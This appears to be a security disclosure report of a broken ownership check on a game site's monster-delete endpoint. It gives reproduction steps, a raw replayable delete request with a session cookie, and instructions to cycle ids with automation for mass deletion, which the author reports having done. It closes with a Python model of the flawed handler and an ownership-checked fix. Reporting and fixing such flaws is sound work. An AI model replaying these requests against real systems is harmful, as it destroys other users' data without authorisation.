Impact:
Any user with a valid session cookie can delete any monster from the database, regardless of ownership and privacy settings.
Steps to reproduce:
- Navigate to https://www.compoundx.org and log in with a valid username and password.
- Navigate to https://www.compoundx.org/monstereditor
- Capture the request sent when clicking the Delete button next to an enemy on the right sidebar (shown below).
- Change the monster id (91 in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy in mind and know its id.
- Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass deletion.
Using the below packet, I was able to delete every monster in the database by replacing §§ with integers from 1 to 91 inclusive with Burp Suite. I determined that 91 was the maximum monster id by creating a new monster prior to executing the deletions, though I could have simply run 1 through 1000.
POST /deletemonster/91 HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 0
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monstereditor
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESt7TA.ZxYMIpqwBmavRPoViTS84kGQ09w
Recommended fix:
Enforce an ownership check on the delete endpoint so that non-admin users can only delete monsters they created themselves. This would prevent a bad actor holding a single non-admin session cookie from deleting monsters owned by other users.
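As an added illustration of the recommended fix (example code written for this report, not the site's own handler, which is not shown), here is a minimal Python model of the delete endpoint with the reported behaviour beside an ownership-checked version. The monster table, user names and the 401/404/200 result codes are constructed assumptions.

```python
from dataclasses import dataclass


@dataclass
class Monster:
    id: int
    owner: str
    name: str


@dataclass
class User:
    username: str
    is_admin: bool = False


def make_db():
    """Constructed in-memory stand-in for the site's monster table."""
    return {
        1: Monster(1, "alice", "gelatinous cube"),
        2: Monster(2, "bob", "mimic"),
        3: Monster(3, "carol", "beholder"),
    }


def delete_monster_vulnerable(db, user, monster_id):
    """Mirrors the reported behaviour: any logged-in user may delete any id."""
    if user is None:
        return 401  # no valid session
    if monster_id not in db:
        return 404
    del db[monster_id]  # no check that user owns the monster
    return 200


def delete_monster_fixed(db, user, monster_id):
    """Object-level authorization: only the owner or an admin may delete."""
    if user is None:
        return 401
    monster = db.get(monster_id)
    # Answer 404 for both "missing" and "not yours" so the endpoint does not
    # confirm to a caller cycling through ids which ones exist; use 403
    # instead if revealing existence is acceptable for this application.
    if monster is None:
        return 404
    if not (user.is_admin or monster.owner == user.username):
        return 404
    del db[monster_id]
    return 200
```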